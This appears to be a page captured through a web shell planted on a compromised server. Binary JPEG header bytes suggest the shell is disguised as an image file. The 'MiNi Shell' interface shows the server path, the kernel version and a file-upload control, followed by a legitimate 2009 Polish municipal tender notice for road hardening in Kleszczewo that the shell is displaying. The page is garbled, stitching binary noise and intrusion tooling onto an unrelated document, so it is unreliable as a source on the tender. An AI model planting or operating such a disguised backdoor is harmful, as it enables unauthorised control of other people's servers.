JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/133402-N-2009.html

<p class="kh_header"><b>Kleszczewo: Utwardzenie dróg  gruzem  betonowym  oraz kamieniem naturalnym  -    gmina Kleszczewo</b><br>
<b>Numer ogłoszenia: 133402 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kleszczewo - Urząd Gminy Kleszczewo , ul. Poznańska 4, 63-005 Kleszczewo, woj. wielkopolskie, tel. 061 8176017, 8176020, 8176033, faks 061 8176184.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleszczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie dróg  gruzem  betonowym  oraz kamieniem naturalnym  -    gmina Kleszczewo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  utwardzenie    nawierzchni   dróg gminnych w miejscowości Gowarzewo , gmina Kleszczewo. Polegać ono będzie na ukształtowaniu  koryta pod wskazane przebiegi dróg poprzez ścięcie nadmiaru gruntu w ilości koniecznej do uzyskania wymaganej rzędnej wysokościowej, zagęszczeniu warstwy do uzyskania wskazanego wskaźnika zagęszczenia 0,97, dostawie i wbudowaniu gruzu betonowego gr, 15cm. /frakcji 16-63/,      wyprofilowaniu i zagęszczaniu wbudowanego materiału /wskaźnik zagęszczenia 0,97/, zaklinowaniu wbudowanego materiału klińcem / kamieniem naturalnym frakcja 8-32. Warstwa klinująca grubości ?    5cm. Przewidywana szerokość utwardzonej nawierzchni  5,00 m, z uwzględnieniem dwustronnego spadku  2,5%.Łączna długość odcinków wynosi ? 4810 m. Ścięty grunt powinien być wykorzystany na umocnienie poboczy ( uformowanie i zawałowanie)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu.
1.  Ogólne warunki udziału w postępowaniu
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1) posiadają  odpowiednie zgody na prowadzenie   działalności lub czynności, związanych z realizacją 
    przedmiotu zamówienia,
2) posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
    zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do  
    udostępnienia     potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Warunki szczegółowe wymagane od wykonawców :
1)	Wykonawca musi dysponować pracownikami posiadającymi odpowiednie kwalifikacje zawodowe - osoby wyznaczone przez Wykonawcę do realizacji zamówienia muszą posiadać uprawnienia - prawo jazdy odpowiedniej kategorii, oraz uprawnienia  w zależności od obsługiwanego pojazdu lub sprzętu ,  
2)	wykonawca musi dysponować odpowiednimi pojazdami oraz niezbędnym sprzętem (wraz z obsługą) przeznaczonymi wyłącznie do realizacji niniejszego przedmiotu zamówienia.  
3)	wykonawca w pięciu ostatnich latach zrealizował lub aktualnie realizuje (min. przez co najmniej 8 miesięcy) z należytą starannością usługę o charakterze i złożoności zbliżonej do przedmiotu zamówienia objętego niniejszym postępowaniem (o wartości min 80 % ceny ofertowej brutto) Udokumentuje  odpowiednimi referencjami potwierdzającymi ich realizację.
4)	wykonawca posiada: polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia,
5)   Wykonawca udzieli gwarancji na roboty budowlane  na okres 24 miesięcy od daty odbioru   końcowego.Od Tego miejsca
 6)   w przypadku ewentualnych zamówień uzupełniających i dodatkowych, dokonywanych przez        Zamawiającego w ciągu pierwszego kwartału po odbiorze przedmiotu zamówienia, oferent 
      zrealizuje je w cenach jednostkowych nie przekraczających wartości wynikających ze złożonej 
      oferty ( oświadczenie do formularza ofert. Załącznik nr 10) .
 7)  Wykonawca zobowiązany będzie dostarczyć  materiał  użyty do realizacji przedmiotu  zamówienia     wolny od       zanieczyszczeń, między innymi  od azbestu, styropianu, plastiku,  tekstyliów,   szkła,     ( oświadczenie  do formularza        ofert. Załącznik nr 11), oraz koncesję na przetwarzanie materiałów z rozbiórki (własną lub sprzedawcy gruzu         betonowego wbudowanego w dany odcinek drogi -  sukcesywnie w chwili wbudowania )
8)  Wykonawca  posiada dokumenty zezwalające na prowadzenie działalności w zakresie transportu     i obrotu  odpadami    
     (załącznik   do formularza ofert. Załącznik nr 12).


3.     Ocena spełnienia warunków w postępowaniu o zamówienie publiczne 
3.1.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o
których mowa w art. 22. ust.  1 pkt. 1-4, art. 24 ust. 1 Prawa zamówień publicznych, wykonawców,     którzy   bezpośrednio  wykonywali    czynności    związane    z    przygotowaniem     prowadzonego postępowania,   lub   posługiwali   się   w   celu   sporządzenia   oferty   osobami   uczestniczącymi   w dokonywaniu tych czynności, chyba, że udział  tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji, wykonawców,   którzy   złożyli   nieprawdziwe   informacje   mające   wpływ   na   wynik prowadzonego postępowania, wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy , z zastrzeżeniem art. 26 ust. 3 wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> XI. Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenie spełnienia warunków udziału w postępowaniu
W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
1.aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności  
   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności 
   gospodarczej, potwierdzające dopuszczenia do obrotu prawnego w zakresie objętym przedmiotem 
   zamówienia w tym  zezwoleń ,	koncesji, lub licencji, jeżeli ustawy nakładają obowiązek 
   posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym 
   zamówieniem publicznym, zwanym dalej zamówieniem.   wystawionego nie wcześniej niż 6 miesięcy przed 
   upływem terminu składania wniosków o   dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
   albo składania ofert, załącznik nr 4 do formularza ofertowego
2.dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów
    prawa lub innych dokumentów rejestrowych,
3.oświadczenie o spełnieniu warunków  udziału w postępowaniu  o udzielenie zamówienia publicznego 
    zgodnego z art. 22 ust.1  ustawy  Prawo zamówień publicznych z wykorzystaniem wzoru- zawartym w 
    (zał. nr 4 do SIWZ jako załącznik nr 2 do formularza ofertowego),
4. wypełniony i podpisany formularz ofertowy  (zał. nr 3 do SIWZ),
5. wypełniony i podpisany KOSZTORYS   OFERTOWY-  (zał. nr  2 do SIWZ).
6. zaparafowany wzór umowy - każda zapisana strona, (zał. nr 6 SIWZ jako załącznik nr 3 do formularza ofertowego), jako akceptacja warunków w niej     zawartych,
2.    Inne dokumenty:
1)    W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny
       a także dysponuje osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty,
a)	        wykaz sprzętu (jakim dysponuje wykonawca wraz z odpowiednim opisem) przeznaczonego do realizacji przedmiotu zamówienia, (zał. 7 do SIWZ)
b)          wykaz osób i podmiotów z imiennym wykazem nadzoru kierownik robót - uprawnienia do    
       kierowania i nadzorowania robót drogowych , przynależność do właściwej izby inżynierów 
       budownictwa, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu 
       zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, 
       a   także   zakresu wykonywanych przez nich czynności (zał. Nr 8 do SIWZ), 
          c)         wykaz wykonanych robót wypełniony załącznik nr 5 - Doświadczenie Wykonawcy , a w 
       przypadku świadczeń okresowych lub ciągłych również wykonywanych,  w okresie ostatnich
       pięciu u  lat przed dniem wszczęcia postępowania o       udzielenie   zamówienia, a jeżeli okres
       prowadzenia działalności jest krótszy - w tym okresie,       odpowiadających   swoim rodzajem i 
       wartością dostawom  lub usługom stanowiącym przedmiot   zamówienia, z podaniem ich
       wartości, przedmiotu, dat wykonania i dokumentów        potwierdzających,   że te dostawy  lub 
       usługi zostały wykonane należycie,  (o wartości min. 80 %  ceny ofertowej brutto), przed dniem 
       wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
       krótszy  - w tym okresie, odpowiadających swoim rodzajem i     wartością usługom stanowiącym 
       przedmiot  zamówienia, z podaniem ich wartości, dat i miejsca         wykonania, należy załączyć 
      dokumenty  (referencje)   potwierdzające, że roboty te zostały wykonane        należycie (wg wzoru -
      zał. Nr 6),
2)	W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawcy przedłoży następujące dokumenty złożone jako załącznik nr 3 do SIWZ)  do  formularza ofertowego.
       a) Informacje z Krajowego Rejestru Karnego, dotyczące prawomocnego skazania za przestępstwo
       popełnione w związku z postępowaniem o udzielenie zamówienia publicznego (szczególnie: wyłudzenia    
       zamówienia, utrudnienia lub udaremnienia przetargu, zmowy przetargowej, przekupstwa) lub za
       jakiekolwiek inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych w zakresie 
       określonym w art. 24 ust. 4-9 ustawy, wystawione nie wcześniej niż 6 miesięcy przed terminem składania
       ofert.  Jeśli oferentem jest  spółka prawa handlowego ww. informacje powinny dotyczyć członków zarządu 
       firmy,( zał. nr 5 do formularza ofertowego )
       b)Aktualne zaświadczenia z właściwego Urzędu Skarbowego oraz właściwego oddziału Zakładu 
        Ubezpieczeń    społecznych lub KRUS potwierdzające, że oferent nie zalega z uiszczaniem podatków, opłat 
       oraz składek na    ubezpieczenie społeczne, lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie 
       na raty zaległych  płatności, zaświadczenia muszą zostać wydane nie wcześniej niż 3 miesiące przed 
       terminem składania ofert, ( zał. nr  6,7 do formularza ofertowego )
3)	Kserokopia  polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca 
jest ubezpieczony od        odpowiedzialności cywilnej w zakresie prowadzonej działalności, ( zał.     do formularza ofertowego, załącznik nr 13).
4)	Wykonawca  załączy aktualne dokumenty zezwalające na prowadzenie działalności w zakresie 
transportu    i zbierania odpadów    (załącznik   do formularza ofert. Załącznik nr 12).
5)  Wymagane oświadczenia 
       a)   (oświadczenie do formularza ofert. Załącznik nr 10), że w przypadku ewentualnych  zamówień 
       uzupełniających , dokonywanych przez   Zamawiającego w ciągu pierwszego  półrocza  po 
       odbiorze przedmiotu zamówienia, oferent  zrealizuje je w cenach jednostkowych nie 
       przekraczających wartości wynikających ze złożonej     oferty, i dodatkowych po cenach 
       jednostkowych obowiązujących  w dniu złożenia oferty obliczonych na podstawie 
       obowiązujących  katalogów KRN.
       b) ( oświadczenie  do formularza ofert. Załącznik nr 11), że   materiał  użyty do realizacji 
           przedmiotu  zamówienia Wykonawca zobowiązuje się  je  dostarczyć  wolne  od 
           zanieczyszczeń, między innymi  od azbestu, styropianu, plastiku,  tekstyliów,   szkła, oraz 
           koncesję na przetwarzanie materiałów z rozbiórki (własną lub sprzedawcy gruzu betonowego 
          wbudowanego w dany odcinek drogi ) 
3.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiedni, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dodatkowe dokumenty wymagane w przypadku składania oferty wspólnej
1) Umowa regulująca współpracę podmiotów występujących wspólnie lub zobowiązanie do jej zawarcia w przypadku wyboru ich oferty.
2) Oferta winna zawierać wymienione wcześniej wymagane dokumenty dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kleszczewo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy w Kleszczewie   ul. Poznańska 4,  63-005 Kleszczewo 
pokój nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 09:00, miejsce: Urząd  Gminy w Kleszczewie   ul. Poznańska 4,  63-005 Kleszczewo  sekretariat pok. Nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com